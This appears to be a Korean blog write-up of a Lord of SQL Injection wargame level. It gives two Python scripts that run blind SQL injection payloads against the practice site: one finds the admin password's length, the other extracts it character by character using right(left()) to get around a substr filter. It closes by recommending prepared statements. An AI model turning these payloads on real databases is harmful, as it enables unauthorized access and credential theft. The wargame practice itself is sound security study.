
[Lord Of SQL Injection] 11번

Kwon Oh! JUN 2022. 2. 2. 00:44

패스워드 길이 알아내기

import requests
import string

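# Step 1 of the write-up: find the length of the stored password.
# The page text is the only feedback channel, so each request asks a single
# yes/no question about length(pw) and looks for the "Hello admin" marker.
# The technique depends on the level concatenating the pw parameter into its
# SQL string; with a bound parameter the injected quote would be plain data.
url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php"
cookie = dict(PHPSESSID="쿠키값")  # placeholder for the wargame session cookie

for i in range(1, 100):
    # `like` stands in for an equality test and %23 (#) comments out the rest
    # of the query.
    # NOTE(review): presumably `=` is filtered on this level; the page itself
    # only states that substr is.
    param = "?pw='|| length(pw)like'" + str(i) + "'%23"
    len_result = url + param
    # A timeout keeps one stalled connection from hanging the whole loop.
    response = requests.get(len_result, cookies=cookie, timeout=10)

    # Membership test instead of find(...) > 0, which skips a marker at offset 0.
    if "Hello admin" in response.text:
        # The value found here is the length, so label it as such.
        print("password length :" + str(i))
        break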

패스워드 알아내기

import requests
import string

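# Step 2 of the write-up: recover the password one character at a time.
# Each request compares the ASCII code of one character of pw against one
# candidate and reads the answer from the "Hello admin" marker in the page.
url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php"
cookie = dict(PHPSESSID="쿠키값")  # placeholder for the wargame session cookie

# Candidate alphabet: digits first, then ASCII letters.
asc = string.digits + string.ascii_letters
result = ""

# 8 positions are probed.
# NOTE(review): presumably 8 is the length reported by the length script - confirm.
for i in range(1, 9):
    for j in asc:
        # right(left(pw, i), 1) yields the i-th character without substr,
        # which the write-up says is filtered; %27 is a quote, %23 is '#'.
        param = "?pw=%27||ascii(right(left(pw," + str(i) + "),1))like%27" + str(ord(j)) + "%27%23"
        print(param)
        res_url = url + param
        # A timeout keeps one stalled connection from hanging the whole loop.
        response = requests.get(res_url, cookies=cookie, timeout=10)

        # Membership test instead of find(...) > 0, which skips a marker at offset 0.
        if "Hello admin" in response.text:
            print("success")
            print(j)
            result += j
            break
    else:
        # No candidate matched this position (a character outside `asc`, or an
        # expired session). Stop here instead of silently skipping it, which
        # would leave `result` shorter than and misaligned with the real value.
        print("no match at position " + str(i))
        break
print("pw :" + result)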

 

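substr이 필터링되어 있어서 right(left(pw,i),1)로 i번째 문자를 잘라내는 방식으로 우회해서 알아냈다. 특정 함수명만 막는 블랙리스트 필터는 이렇게 동등한 표현으로 대체되므로, 근본적인 방어는 입력을 쿼리 문자열에 이어 붙이지 않고 바인딩(prepared statement)으로 전달하는 것이다.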